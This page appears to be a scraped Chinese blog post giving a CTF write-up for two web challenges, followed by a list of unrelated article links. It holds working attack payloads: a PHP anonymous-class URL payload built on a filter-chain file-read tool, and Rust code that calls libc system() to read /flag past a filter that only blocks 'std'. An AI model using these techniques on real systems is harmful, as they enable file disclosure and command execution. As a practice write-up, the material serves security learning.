当前位置: 首页 > news >正文

【Web】2024红明谷CTF初赛个人wp(2/4)

news 来源:原创 2024/5/21 11:18:54

目录

ezphp

playground

时间原因只打了2个小时,出了2道,简单记录一下

ezphp

参考文章

PHP filter chains: file read from error-based oracle

https://github.com/synacktiv/php_filter_chains_oracle_exploit

用上面的脚本爆出部分源码,直接/flag.php?ezphpPhp=1访问

 

 

创建了一个匿名类

参考文章:

php匿名类 - Hi! 阿金 

最终payload:

/flag.php?ezphpPhp8=class@anonymous%00/var/www/html/flag.php:7$0

🤬本地通了,远程一直not found,重开靶机后一样的payload直接打出来了

 

playground

进题是一段rust代码

重点关注post的/rust_code这个路由

#[post("/rust_code", data = "<code>")]
fn run_rust_code(code: String) -> String{if code.contains("std") {return "Error: std is not allowed".to_string();}//generate a random 5 length file namelet file_name = rand::thread_rng().sample_iter(&rand::distributions::Alphanumeric).take(5).map(char::from).collect::<String>();if let Ok(mut file) = File::create(format!("playground/{}.rs", &file_name)) {file.write_all(code.as_bytes());}if let Ok(build_output) = Command::new("rustc").arg(format!("playground/{}.rs",&file_name)).arg("-C").arg("debuginfo=0").arg("-C").arg("opt-level=3").arg("-o").arg(format!("playground/{}",&file_name)).output() {if !build_output.status.success(){fs::remove_file(format!("playground/{}.rs",&file_name));return String::from_utf8_lossy(build_output.stderr.as_slice()).to_string();}}fs::remove_file(format!("playground/{}.rs",&file_name));if let Ok(output) = Command::new(format!("playground/{}",&file_name)).output() {if !output.status.success(){fs::remove_file(format!("playground/{}",&file_name));return String::from_utf8_lossy(output.stderr.as_slice()).to_string();} else{fs::remove_file(format!("playground/{}",&file_name));return String::from_utf8_lossy(output.stdout.as_slice()).to_string();}}return String::default();}

  1. 首先,函数检查输入的代码是否包含了"std",如果包含,则返回一个错误消息,表示不允许使用标准库(std)。

  2. 然后,函数生成一个随机的长度为5的文件名,该文件名用于存储接收到的Rust代码。

  3. 接着,函数尝试创建一个名为playground/{}.rs的文件,其中{}会被随机生成的文件名所替代,并将接收到的代码写入文件中。

  4. 接下来,函数使用Command::new("rustc")创建一个Rust编译器的命令,该命令编译刚刚创建的Rust源代码文件,并传入了一些编译选项,例如关闭调试信息和设置优化级别。

  5. 如果编译成功,则继续执行下一步,否则删除刚创建的Rust源代码文件,并返回编译器输出的错误消息。

  6. 如果编译成功,函数继续使用Command::new(format!("playground/{}", &file_name))创建一个命令,该命令运行刚刚编译生成的可执行文件。

  7. 如果运行成功,则返回程序的标准输出结果,否则删除生成的可执行文件,并返回程序的标准错误输出结果。

  8. 最后,无论是编译失败还是运行失败,都会删除生成的Rust源代码文件,并返回一个空字符串。

  

payload:

extern "C"{fn system(cmd: *const u8) -> i32;
}
fn main(){unsafe{system("cat /flag".as_ptr());}
}

直接放请求体里即可 

相关文章:

  • 场景文本检测识别学习 day02(AlexNet论文阅读、ResNet论文精读)
  • 【话题:工作生活】2022年工作总结--疫情下的上海,疫情中的我。
  • 大语言模型如何工作?
  • PTA 位运算
  • ffmpeg 从现有视频中截取一段
  • 【Node.js】短链接
  • 无线游戏手柄的测试(Windows11系统手柄调试方法)
  • 构建高可用性数据库架构:深入探索Oracle Active Data Guard(ADG)
  • 【Leetcode每日一题】 递归 - 二叉树剪枝(难度⭐⭐)(50)
  • DataLoader的使用
  • RabbitMQ3.13.x之七_RabbitMQ消息队列模型
  • 如何在Flutter应用中配置ipa Guard进行混淆
  • Spring之事务底层源码解析
  • 懒人必备!4个PS抠图技巧,让你轻松处理复杂背景!
  • 使用阿里云试用Elasticsearch学习:2.3 深入搜索——多字段搜索
  • 《Javascript数据结构和算法》笔记-「字典和散列表」
  • 【5+】跨webview多页面 触发事件(二)
  • Akka系列(七):Actor持久化之Akka persistence
  • Android 控件背景颜色处理
  • MyEclipse 8.0 GA 搭建 Struts2 + Spring2 + Hibernate3 (测试)
  • MySQL数据库运维之数据恢复
  • 大数据与云计算学习:数据分析(二)
  • 关于 Cirru Editor 存储格式
  • 基于Javascript, Springboot的管理系统报表查询页面代码设计
  • 基于MaxCompute打造轻盈的人人车移动端数据平台
  • 扑朔迷离的属性和特性【彻底弄清】
  • 七牛云假注销小指南
  • 如何合理的规划jvm性能调优
  • 如何利用MongoDB打造TOP榜小程序
  • 深入 Nginx 之配置篇
  • 微信如何实现自动跳转到用其他浏览器打开指定页面下载APP
  • 我感觉这是史上最牛的防sql注入方法类
  • 与 ConTeXt MkIV 官方文档的接驳
  • ​sqlite3 --- SQLite 数据库 DB-API 2.0 接口模块​
  • ​ssh-keyscan命令--Linux命令应用大词典729个命令解读
  • ​草莓熊python turtle绘图代码(玫瑰花版)附源代码
  • # 再次尝试 连接失败_无线WiFi无法连接到网络怎么办【解决方法】
  • #{}和${}的区别?
  • #我与Java虚拟机的故事#连载17:我的Java技术水平有了一个本质的提升
  • (26)4.7 字符函数和字符串函数
  • (30)数组元素和与数字和的绝对差
  • (三)终结任务
  • (十)【Jmeter】线程(Threads(Users))之jp@gc - Stepping Thread Group (deprecated)
  • (收藏)Git和Repo扫盲——如何取得Android源代码
  • (转)重识new
  • (转载)虚幻引擎3--【UnrealScript教程】章节一:20.location和rotation
  • .dwp和.webpart的区别
  • .NET Micro Framework 4.2 beta 源码探析
  • .NET 表达式计算:Expression Evaluator
  • .NET开发不可不知、不可不用的辅助类(一)
  • .Net下使用 Geb.Video.FFMPEG 操作视频文件
  • .NET业务框架的构建
  • .net中应用SQL缓存(实例使用)
  • .pop ----remove 删除
  • /proc/stat文件详解(翻译)